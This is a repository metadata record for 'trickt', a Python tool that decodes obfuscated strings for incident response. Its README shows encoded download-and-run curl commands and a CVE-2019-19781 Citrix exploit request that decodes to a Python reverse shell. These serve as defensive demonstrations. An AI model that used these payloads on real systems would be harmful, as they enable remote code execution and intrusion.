{"id":34106715,"url":"https://github.com/krayzpipes/trickt","last_synced_at":"2026-04-09T04:32:09.242Z","repository":{"id":57477080,"uuid":"234639794","full_name":"krayzpipes/trickt","owner":"krayzpipes","description":"Search data for trickiness and obfuscation.","archived":false,"fork":false,"pushed_at":"2020-02-10T05:50:55.000Z","size":51,"stargazers_count":0,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"master","last_synced_at":"2026-01-03T08:03:39.723Z","etag":null,"topics":["deobfuscation","incident-response","security"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/krayzpipes.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-01-17T21:28:27.000Z","updated_at":"2020-02-10T05:50:57.000Z","dependencies_parsed_at":"2022-09-14T16:41:24.507Z","dependency_job_id":null,"html_url":"https://github.com/krayzpipes/trickt","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/krayzpipes/trickt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/krayzpipes%2Ftrickt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/krayzpipes%2Ftrickt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/krayzpipes%2Ftrickt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/krayzpipes%2Ftrickt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/krayzpipes","download_url":"https://codeload.github.com/krayzpipes/trickt/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/krayzpipes%2Ftrickt/sbom","scorecard":{"id":569675,"data":{"date":"2025-08-11","repo":{"name":"github.com/krayzpipes/trickt","commit":"93cba02386f96c6a1fc04b8339f05c8cb44aa65e"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":1.7,"checks":[{"name":"Token-Permissions","score":-1,"reason":"No tokens found","details":null,"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":-1,"reason":"no workflows found","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Code-Review","score":0,"reason":"Found 0/13 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":-1,"reason":"no dependencies found","details":null,"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: Apache License 2.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'master'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 3 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"11 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: PYSEC-2024-48 / GHSA-fj7x-q9j7-g6q6","Warn: Project is vulnerable to: PYSEC-2024-4 / GHSA-2mqj-m65w-jghx","Warn: Project is vulnerable to: PYSEC-2023-165 / GHSA-cwvm-v4w8-q58c","Warn: Project is vulnerable to: PYSEC-2022-42992 / GHSA-hcpj-qp55-gfph","Warn: Project is vulnerable to: PYSEC-2023-137 / GHSA-pr76-5cm5-w9cj","Warn: Project is vulnerable to: PYSEC-2023-161 / GHSA-wfm5-v35h-vwf4","Warn: Project is vulnerable to: PYSEC-2020-92 / GHSA-hj5v-574p-mj7c","Warn: Project is vulnerable to: PYSEC-2022-42969","Warn: Project is vulnerable to: PYSEC-2020-96 / GHSA-6757-jp84-gxfx","Warn: Project is vulnerable to: PYSEC-2021-142 / GHSA-8q59-q68h-6hv4","Warn: Project is vulnerable to: GHSA-jfmj-5v4g-7637"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T15:58:07.309Z","repository_id":57477080,"created_at":"2025-08-20T15:58:07.309Z","updated_at":"2025-08-20T15:58:07.309Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31586403,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-08T14:31:17.711Z","status":"online","status_checked_at":"2026-04-09T02:00:06.848Z","response_time":112,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["deobfuscation","incident-response","security"],"created_at":"2025-12-14T18:03:44.854Z","updated_at":"2026-04-09T04:32:09.235Z","avatar_url":"https://github.com/krayzpipes.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# trickt\nFinds and converts obfuscated strings into a human readable form.\n\n## Install\n\n```bash\n$ pip3 install trickt\n```\n\n## Run\n\n### Searching individual strings\n\nI refer to obfuscation as trickiness because I'm a child at heart.\n\n`trickt` outputs strings as byte strings so you can see if there are goofy characters visually.\n\nYou can pass a file path to read and decode or decode a string directly.\n\n**Base64**\n\n- By default, this only matches base64 strings that are at least 32 characters in length (not including padding). This\nis an effort to keep noise down.\n- You can change via the API directly or you can use the `-m` switch.\n```bash\n\n$ trickt 'Y3VybCBoeHhwczovL3Bhc3RlYmluLmNvbS9yYXcvYmFzZTY0X2VuY29kZWQgPiBiYWRfZmlsZS5zaCAmJiAuL2JhZF9maWxlLnNoCg=='\n\nSearching string for trickiness...\n\nline 1::original:\u003e  b'Y3VybCBoeHhwczovL3Bhc3RlYmluLmNvbS9yYXcvYmFzZTY0X2VuY29kZWQgPiBiYWRfZmlsZS5zaCAmJiAuL2JhZF9maWxlLnNoCg=='\n    |\n    |--decoded_base64\u003e  b'curl hxxps://pastebin.com/raw/base64_encoded \u003e bad_file.sh \u0026\u0026 ./bad_file.sh'\n```\n\n**Code points**\n```bash\n$ trickt 'chr(99) . chr(117) . chr(114) . chr(108) . chr(32) . chr(104) . chr(120) . chr(120) . chr(112) . chr(115) . chr(58) . chr(47) . chr(47) . chr(112) . chr(97) . chr(115) . chr(116) . chr(101) . chr(98) . chr(105) . chr(110) . chr(46) . chr(99) . chr(111) . chr(109) . chr(47) . chr(114) . chr(97) . chr(119) . chr(47) . chr(99) . chr(111) . chr(100) . chr(101) . chr(95) . chr(112) . chr(111) . chr(105) . chr(110) . chr(116) . chr(115) . chr(32) . chr(62) . chr(32) . chr(98) . chr(97) . chr(100) . chr(95) . chr(102) . chr(105) . chr(108) . chr(101) . chr(46) . chr(115) . chr(104) . chr(32) . chr(38) . chr(38) . chr(32) . chr(46) . chr(47) . chr(98) . chr(97) . chr(100) . chr(95) . chr(102) . chr(105) . chr(108) . chr(101) . chr(46) . chr(115) . chr(104)'\n\nSearching string for trickiness...\n\nline 1::original:\u003e  b'chr(99) . chr(117) . chr(114) . chr(108) . chr(32) . chr(104) . chr(120) . chr(120) . chr(112) . chr(115) . chr(58) . chr(47) . chr(47) . chr(112) . chr(97) . chr(115) . chr(116) . chr(101) . chr(98) . chr(105) . chr(110) . chr(46) . chr(99) . chr(111) . chr(109) . chr(47) . chr(114) . chr(97) . chr(119) . chr(47) . chr(99) . chr(111) . chr(100) . chr(101) . chr(95) . chr(112) . chr(111) . chr(105) . chr(110) . chr(116) . chr(115) . chr(32) . chr(62) . chr(32) . chr(98) . chr(97) . chr(100) . chr(95) . chr(102) . chr(105) . chr(108) . chr(101) . chr(46) . chr(115) . chr(104) . chr(32) . chr(38) . chr(38) . chr(32) . chr(46) . chr(47) . chr(98) . chr(97) . chr(100) . chr(95) . chr(102) . chr(105) . chr(108) . chr(101) . chr(46) . chr(115) . chr(104)'\n    |\n    |--decoded_code_point\u003e  b'curl hxxps://pastebin.com/raw/code_points \u003e bad_file.sh \u0026\u0026 ./bad_file.sh'\n```\n\n**Escaped unicode**\n\n```bash\n$ trickt '\\u0063\\u0075\\u0072\\u006c\\u0020\\u0068\\u0078\\u0078\\u0070\\u0073\\u003a\\u002f\\u002f\\u0070\\u0061\\u0073\\u0074\\u0065\\u0062\\u0069\\u006e\\u002e\\u0063\\u006f\\u006d\\u002f\\u0072\\u0061\\u0077\\u002f\\u0065\\u0073\\u0063\\u0061\\u0070\\u0065\\u0064\\u005f\\u0075\\u006e\\u0069\\u0063\\u006f\\u0064\\u0065\\u0020\\u003e\\u0020\\u0062\\u0061\\u0064\\u005f\\u0066\\u0069\\u006c\\u0065\\u002e\\u0073\\u0068\\u0020\\u0026\\u0026\\u0020\\u002e\\u002f\\u0062\\u0061\\u0064\\u005f\\u0066\\u0069\\u006c\\u0065\\u002e\\u0073\\u0068'\n\nSearching string for trickiness...\n\nline 1::original:\u003e  b'\\\\u0063\\\\u0075\\\\u0072\\\\u006c\\\\u0020\\\\u0068\\\\u0078\\\\u0078\\\\u0070\\\\u0073\\\\u003a\\\\u002f\\\\u002f\\\\u0070\\\\u0061\\\\u0073\\\\u0074\\\\u0065\\\\u0062\\\\u0069\\\\u006e\\\\u002e\\\\u0063\\\\u006f\\\\u006d\\\\u002f\\\\u0072\\\\u0061\\\\u0077\\\\u002f\\\\u0065\\\\u0073\\\\u0063\\\\u0061\\\\u0070\\\\u0065\\\\u0064\\\\u005f\\\\u0075\\\\u006e\\\\u0069\\\\u0063\\\\u006f\\\\u0064\\\\u0065\\\\u0020\\\\u003e\\\\u0020\\\\u0062\\\\u0061\\\\u0064\\\\u005f\\\\u0066\\\\u0069\\\\u006c\\\\u0065\\\\u002e\\\\u0073\\\\u0068\\\\u0020\\\\u0026\\\\u0026\\\\u0020\\\\u002e\\\\u002f\\\\u0062\\\\u0061\\\\u0064\\\\u005f\\\\u0066\\\\u0069\\\\u006c\\\\u0065\\\\u002e\\\\u0073\\\\u0068'\n    |\n    |--decoded_escaped_characters\u003e  b'curl hxxps://pastebin.com/raw/escaped_unicode \u003e bad_file.sh \u0026\u0026 ./bad_file.sh'\n```\n**Escaped hex**\n\n```bash\n$ trickt '\\x63\\x75\\x72\\x6C\\x20\\x68\\x78\\x78\\x70\\x73\\x3A\\x2F\\x2F\\x70\\x61\\x73\\x74\\x65\\x62\\x69\\x6E\\x2E\\x63\\x6F\\x6D\\x2F\\x72\\x61\\x77\\x2F\\x65\\x73\\x63\\x61\\x70\\x65\\x64\\x5F\\x68\\x65\\x78\\x20\\x3E\\x20\\x62\\x61\\x64\\x5F\\x66\\x69\\x6C\\x65\\x2E\\x73\\x68\\x20\\x26\\x26\\x20\\x2E\\x2F\\x62\\x61\\x64\\x5F\\x66\\x69\\x6C\\x65\\x2E\\x73\\x68'\n\nSearching string for trickiness...\n\nline 1::original:\u003e  b'\\\\x63\\\\x75\\\\x72\\\\x6C\\\\x20\\\\x68\\\\x78\\\\x78\\\\x70\\\\x73\\\\x3A\\\\x2F\\\\x2F\\\\x70\\\\x61\\\\x73\\\\x74\\\\x65\\\\x62\\\\x69\\\\x6E\\\\x2E\\\\x63\\\\x6F\\\\x6D\\\\x2F\\\\x72\\\\x61\\\\x77\\\\x2F\\\\x65\\\\x73\\\\x63\\\\x61\\\\x70\\\\x65\\\\x64\\\\x5F\\\\x68\\\\x65\\\\x78\\\\x20\\\\x3E\\\\x20\\\\x62\\\\x61\\\\x64\\\\x5F\\\\x66\\\\x69\\\\x6C\\\\x65\\\\x2E\\\\x73\\\\x68\\\\x20\\\\x26\\\\x26\\\\x20\\\\x2E\\\\x2F\\\\x62\\\\x61\\\\x64\\\\x5F\\\\x66\\\\x69\\\\x6C\\\\x65\\\\x2E\\\\x73\\\\x68'\n    |\n    |--decoded_escaped_characters\u003e  b'curl hxxps://pastebin.com/raw/escaped_hex \u003e bad_file.sh \u0026\u0026 ./bad_file.sh'\n```\n\n**URL Encoding**\n- `trickt` will attempt to decode URL encoding.\n- This is a recipe for noise and false positives without boundaries in place. To compensate, `trickt` will not return a\n URL decoding result if there's nothing useful after decoding. It's just noise.\n\nFor example, let's look at an exploit attempt for CVE-2019-19781.\n\nThis example uses a sample packet capture from: \nhttps://dshield.org/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/\n\nIn one of HTTP streams, you find a URL Encoded payload that will decode to a script with code\npoints. If I pass the URL encoded payload to `trickt`:\n\n```bash\n$ trickt \u003ca_long_url_encoded_string\u003e\n\nSearching string for trickiness...\n\nline 1::original:\u003e  url=127.0.0.1\u0026title=%5B%25+template.new%28%7B%27BLOCK%27%3D%27print+readpipe%28chr%2847%29+.+chr%28118%29+.+chr%2897%29+.+chr%28114%29+.+chr%2847%29+.+chr%28112%29+.+chr%28121%29+.+chr%28116%29+.+chr%28104%29+.+chr%28111%29+.+chr%28110%29+.+chr%2847%29+.+chr%2898%29+.+chr%28105%29+.+chr%28110%29+.+chr%2847%29+.+chr%28112%29+.+chr%28121%29+.+chr%28116%29+.+chr%28104%29+.+chr%28111%29+.+chr%28110%29+.+chr%2832%29+.+chr%2845%29+.+chr%2899%29+.+chr%2832%29+.+chr%2839%29+.+chr%28105%29+.+chr%28109%29+.+chr%28112%29+.+chr%28111%29+.+chr%28114%29+.+chr%28116%29+.+chr%2832%29+.+chr%28115%29+.+chr%28111%29+.+chr%2899%29+.+chr%28107%29+.+chr%28101%29+.+chr%28116%29+.+chr%2844%29+.+chr%28115%29+.+chr%28117%29+.+chr%2898%29+.+chr%28112%29+.+chr%28114%29+.+chr%28111%29+.+chr%2899%29+.+chr%28101%29+.+chr%28115%29+.+chr%28115%29+.+chr%2844%29+.+chr%28111%29+.+chr%28115%29+.+chr%2859%29+.+chr%28115%29+.+chr%2861%29+.+chr%28115%29+.+chr%28111%29+.+chr%2899%29+.+chr%28107%29+.+chr%28101%29+.+chr%28116%29+.+chr%2846%29+.+chr%28115%29+.+chr%28111%29+.+chr%2899%29+.+chr%28107%29+.+chr%28101%29+.+chr%28116%29+.+chr%2840%29+.+chr%28115%29+.+chr%28111%29+.+chr%2899%29+.+chr%28107%29+.+chr%28101%29+.+chr%28116%29+.+chr%2846%29+.+chr%2865%29+.+chr%2870%29+.+chr%2895%29+.+chr%2873%29+.+chr%2878%29+.+chr%2869%29+.+chr%2884%29+.+chr%2844%29+.+chr%28115%29+.+chr%28111%29+.+chr%2899%29+.+chr%28107%29+.+chr%28101%29+.+chr%28116%29+.+chr%2846%29+.+chr%2883%29+.+chr%2879%29+.+chr%2867%29+.+chr%2875%29+.+chr%2895%29+.+chr%2883%29+.+chr%2884%29+.+chr%2882%29+.+chr%2869%29+.+chr%2865%29+.+chr%2877%29+.+chr%2841%29+.+chr%2859%29+.+chr%28115%29+.+chr%2846%29+.+chr%2899%29+.+chr%28111%29+.+chr%28110%29+.+chr%28110%29+.+chr%28101%29+.+chr%2899%29+.+chr%28116%29+.+chr%2840%29+.+chr%2840%29+.+chr%2834%29+.+chr%2849%29+.+chr%2855%29+.+chr%2850%29+.+chr%2846%29+.+chr%2849%29+.+chr%2854%29+.+chr%2846%29+.+chr%2850%29+.+chr%2857%29+.+chr%2846%29+.+chr%2849%29+.+chr%2834%29+.+chr%2844%29+.+chr%2849%29+.+chr%2850%29+.+chr%2851%29+.+chr%2852%29+.+chr%2853%29+.+chr%2841%29+.+chr%2841%29+.+chr%2859%29+.+chr%28111%29+.+chr%28115%29+.+chr%2846%29+.+chr%28100%29+.+chr%28117%29+.+chr%28112%29+.+chr%2850%29+.+chr%2840%29+.+chr%28115%29+.+chr%2846%29+.+chr%28102%29+.+chr%28105%29+.+chr%28108%29+.+chr%28101%29+.+chr%28110%29+.+chr%28111%29+.+chr%2840%29+.+chr%2841%29+.+chr%2844%29+.+chr%2848%29+.+chr%2841%29+.+chr%2859%29+.+chr%2832%29+.+chr%28111%29+.+chr%28115%29+.+chr%2846%29+.+chr%28100%29+.+chr%28117%29+.+chr%28112%29+.+chr%2850%29+.+chr%2840%29+.+chr%28115%29+.+chr%2846%29+.+chr%28102%29+.+chr%28105%29+.+chr%28108%29+.+chr%28101%29+.+chr%28110%29+.+chr%28111%29+.+chr%2840%29+.+chr%2841%29+.+chr%2844%29+.+chr%2849%29+.+chr%2841%29+.+chr%2859%29+.+chr%2832%29+.+chr%28111%29+.+chr%28115%29+.+chr%2846%29+.+chr%28100%29+.+chr%28117%29+.+chr%28112%29+.+chr%2850%29+.+chr%2840%29+.+chr%28115%29+.+chr%2846%29+.+chr%28102%29+.+chr%28105%29+.+chr%28108%29+.+chr%28101%29+.+chr%28110%29+.+chr%28111%29+.+chr%2840%29+.+chr%2841%29+.+chr%2844%29+.+chr%2850%29+.+chr%2841%29+.+chr%2859%29+.+chr%28112%29+.+chr%2861%29+.+chr%28115%29+.+chr%28117%29+.+chr%2898%29+.+chr%28112%29+.+chr%28114%29+.+chr%28111%29+.+chr%2899%29+.+chr%28101%29+.+chr%28115%29+.+chr%28115%29+.+chr%2846%29+.+chr%2899%29+.+chr%2897%29+.+chr%28108%29+.+chr%28108%29+.+chr%2840%29+.+chr%2891%29+.+chr%2834%29+.+chr%2847%29+.+chr%2898%29+.+chr%28105%29+.+chr%28110%29+.+chr%2847%29+.+chr%28115%29+.+chr%28104%29+.+chr%2834%29+.+chr%2844%29+.+chr%2834%29+.+chr%2845%29+.+chr%28105%29+.+chr%2834%29+.+chr%2893%29+.+chr%2841%29+.+chr%2859%29+.+chr%2839%29%29%27%7D%29%25%5D\u0026desc=desc\u0026UI_inuse=a\n    |\n    |--decoded_url_encoded\u003e  url=127.0.0.1\u0026title=[%+template.new({'BLOCK'='print+readpipe(chr(47)+.+chr(118)+.+chr(97)+.+chr(114)+.+chr(47)+.+chr(112)+.+chr(121)+.+chr(116)+.+chr(104)+.+chr(111)+.+chr(110)+.+chr(47)+.+chr(98)+.+chr(105)+.+chr(110)+.+chr(47)+.+chr(112)+.+chr(121)+.+chr(116)+.+chr(104)+.+chr(111)+.+chr(110)+.+chr(32)+.+chr(45)+.+chr(99)+.+chr(32)+.+chr(39)+.+chr(105)+.+chr(109)+.+chr(112)+.+chr(111)+.+chr(114)+.+chr(116)+.+chr(32)+.+chr(115)+.+chr(111)+.+chr(99)+.+chr(107)+.+chr(101)+.+chr(116)+.+chr(44)+.+chr(115)+.+chr(117)+.+chr(98)+.+chr(112)+.+chr(114)+.+chr(111)+.+chr(99)+.+chr(101)+.+chr(115)+.+chr(115)+.+chr(44)+.+chr(111)+.+chr(115)+.+chr(59)+.+chr(115)+.+chr(61)+.+chr(115)+.+chr(111)+.+chr(99)+.+chr(107)+.+chr(101)+.+chr(116)+.+chr(46)+.+chr(115)+.+chr(111)+.+chr(99)+.+chr(107)+.+chr(101)+.+chr(116)+.+chr(40)+.+chr(115)+.+chr(111)+.+chr(99)+.+chr(107)+.+chr(101)+.+chr(116)+.+chr(46)+.+chr(65)+.+chr(70)+.+chr(95)+.+chr(73)+.+chr(78)+.+chr(69)+.+chr(84)+.+chr(44)+.+chr(115)+.+chr(111)+.+chr(99)+.+chr(107)+.+chr(101)+.+chr(116)+.+chr(46)+.+chr(83)+.+chr(79)+.+chr(67)+.+chr(75)+.+chr(95)+.+chr(83)+.+chr(84)+.+chr(82)+.+chr(69)+.+chr(65)+.+chr(77)+.+chr(41)+.+chr(59)+.+chr(115)+.+chr(46)+.+chr(99)+.+chr(111)+.+chr(110)+.+chr(110)+.+chr(101)+.+chr(99)+.+chr(116)+.+chr(40)+.+chr(40)+.+chr(34)+.+chr(49)+.+chr(55)+.+chr(50)+.+chr(46)+.+chr(49)+.+chr(54)+.+chr(46)+.+chr(50)+.+chr(57)+.+chr(46)+.+chr(49)+.+chr(34)+.+chr(44)+.+chr(49)+.+chr(50)+.+chr(51)+.+chr(52)+.+chr(53)+.+chr(41)+.+chr(41)+.+chr(59)+.+chr(111)+.+chr(115)+.+chr(46)+.+chr(100)+.+chr(117)+.+chr(112)+.+chr(50)+.+chr(40)+.+chr(115)+.+chr(46)+.+chr(102)+.+chr(105)+.+chr(108)+.+chr(101)+.+chr(110)+.+chr(111)+.+chr(40)+.+chr(41)+.+chr(44)+.+chr(48)+.+chr(41)+.+chr(59)+.+chr(32)+.+chr(111)+.+chr(115)+.+chr(46)+.+chr(100)+.+chr(117)+.+chr(112)+.+chr(50)+.+chr(40)+.+chr(115)+.+chr(46)+.+chr(102)+.+chr(105)+.+chr(108)+.+chr(101)+.+chr(110)+.+chr(111)+.+chr(40)+.+chr(41)+.+chr(44)+.+chr(49)+.+chr(41)+.+chr(59)+.+chr(32)+.+chr(111)+.+chr(115)+.+chr(46)+.+chr(100)+.+chr(117)+.+chr(112)+.+chr(50)+.+chr(40)+.+chr(115)+.+chr(46)+.+chr(102)+.+chr(105)+.+chr(108)+.+chr(101)+.+chr(110)+.+chr(111)+.+chr(40)+.+chr(41)+.+chr(44)+.+chr(50)+.+chr(41)+.+chr(59)+.+chr(112)+.+chr(61)+.+chr(115)+.+chr(117)+.+chr(98)+.+chr(112)+.+chr(114)+.+chr(111)+.+chr(99)+.+chr(101)+.+chr(115)+.+chr(115)+.+chr(46)+.+chr(99)+.+chr(97)+.+chr(108)+.+chr(108)+.+chr(40)+.+chr(91)+.+chr(34)+.+chr(47)+.+chr(98)+.+chr(105)+.+chr(110)+.+chr(47)+.+chr(115)+.+chr(104)+.+chr(34)+.+chr(44)+.+chr(34)+.+chr(45)+.+chr(105)+.+chr(34)+.+chr(93)+.+chr(41)+.+chr(59)+.+chr(39))'})%]\u0026desc=desc\u0026UI_inuse=a\n        |\n        |--decoded_code_point\u003e  /var/python/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"172.16.29.1\",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n```\n\nNow, let's pass in part of that URL encoded string that does not contain the code points. There are no results because\ndecoding the URL encoded string yields nothing interesting according to `trickt`.\n\n```bash\n$ trickt \"url=127.0.0.1\u0026title=%5B%25+template.new%28%7B%27BLOCK%27%3D%27print+readpipe%28\"\n\nSearching string for trickiness...\n```\n\n### Searching an entire file\n\n```bash\n$ cat my_bad_file.txt \nnothing on this line\nXHg2M1x4NzVceDcyXHg2Q1x4MjBceDY4XHg3OFx4NzhceDcwXHg3M1x4M0FceDJGXHgyRlx4NzBceDYxXHg3M1x4NzRceDY1XHg2Mlx4NjlceDZFXHgyRVx4NjNceDZGXHg2RFx4MkZceDcyXHg2MVx4NzdceDJGXHg2NVx4NzNceDYzXHg2MVx4NzBceDY1XHg2NFx4NUZceDY4XHg2NVx4NzhceDVGXHg2RVx4NjVceDczXHg3NFx4NjVceDY0XHgyMFx4M0VceDIwXHg2Mlx4NjFceDY0XHg1Rlx4NjZceDY5XHg2Q1x4NjVceDJFXHg3M1x4NjhceDIwXHgyNlx4MjZceDIwXHgyRVx4MkZceDYyXHg2MVx4NjRceDVGXHg2Nlx4NjlceDZDXHg2NVx4MkVceDczXHg2OAo=\nnothing on this line\nnothing on this line\n\u003celement\u003e\u003celement2\u003e\\u0063\\u0075\\u0072\\u006c\\u0020\\u0068\\u0078\\u0078\\u0070\\u0073\\u003a\\u002f\\u002f\\u0070\\u0061\\u0073\\u0074\\u0065\\u0062\\u0069\\u006e\\u002e\\u0063\\u006f\\u006d\\u002f\\u0072\\u0061\\u0077\\u002f\\u0065\\u0073\\u0063\\u0061\\u0070\\u0065\\u0064\\u005f\\u0075\\u006e\\u0069\\u0063\\u006f\\u0064\\u0065\\u0020\\u003e\\u0020\\u0062\\u0061\\u0064\\u005f\\u0066\\u0069\\u006c\\u0065\\u002e\\u0073\\u0068\\u0020\\u0026\\u0026\\u0020\\u002e\\u002f\\u0062\\u0061\\u0064\\u005f\\u0066\\u0069\\u006c\\u0065\\u002e\\u0073\\u0068\u003c/element2\u003e\u003c/element\u003e\nnothing on this line\nmy_hex = '\\x63\\x75\\x72\\x6C\\x20\\x68\\x78\\x78\\x70\\x73\\x3A\\x2F\\x2F' + '\\x70\\x61\\x73\\x74\\x65\\x62\\x69\\x6E\\x2E\\x63\\x6F\\x6D\\x2F' + '\\x72\\x61\\x77\\x2F\\x65\\x73\\x63\\x61\\x70\\x65\\x64\\x5F\\x68\\x65\\x78\\x20\\x3E\\x20\\x62\\x61\\x64\\x5F\\x66\\x69\\x6C\\x65' + '\\x2E\\x73\\x68\\x20\\x26\\x26\\x20\\x2E\\x2F\\x62\\x61\\x64\\x5F\\x66\\x69' + '\\x6C\\x65\\x2E\\x73\\x68'\nnothing on this line\noops, forgot my script here:  readpipe(chr(99) . chr(117) . chr(114) . chr(108) . chr(32) . chr(104) . chr(120) . chr(120) . chr(112) . chr(115) . chr(58) . chr(47) . chr(47) . chr(112) . chr(97) . chr(115) . chr(116) . chr(101) . chr(98) . chr(105) . chr(110) . chr(46) . chr(99) . chr(111) . chr(109) . chr(47) . chr(114) . chr(97) . chr(119) . chr(47) . chr(99) . chr(111) . chr(100) . chr(101) . chr(95) . chr(112) . chr(111) . chr(105) . chr(110) . chr(116) . chr(115) . chr(32) . chr(62) . chr(32) . chr(98) . chr(97) . chr(100) . chr(95) . chr(102) . chr(105) . chr(108) . chr(101) . chr(46) . chr(115) . chr(104) . chr(32) . chr(38) . chr(38) . chr(32) . chr(46) . chr(47) . chr(98) . chr(97) . chr(100) . chr(95) . chr(102) . chr(105) . chr(108) . chr(101) . chr(46) . chr(115) . chr(104)) which I hope you don't catch\nnothing on this line\n```\n```bash\n$ trickt my_bad_file.txt \n\nSearching file 'my_bad_file.txt' for trickiness...\n\nline 2::original:\u003e  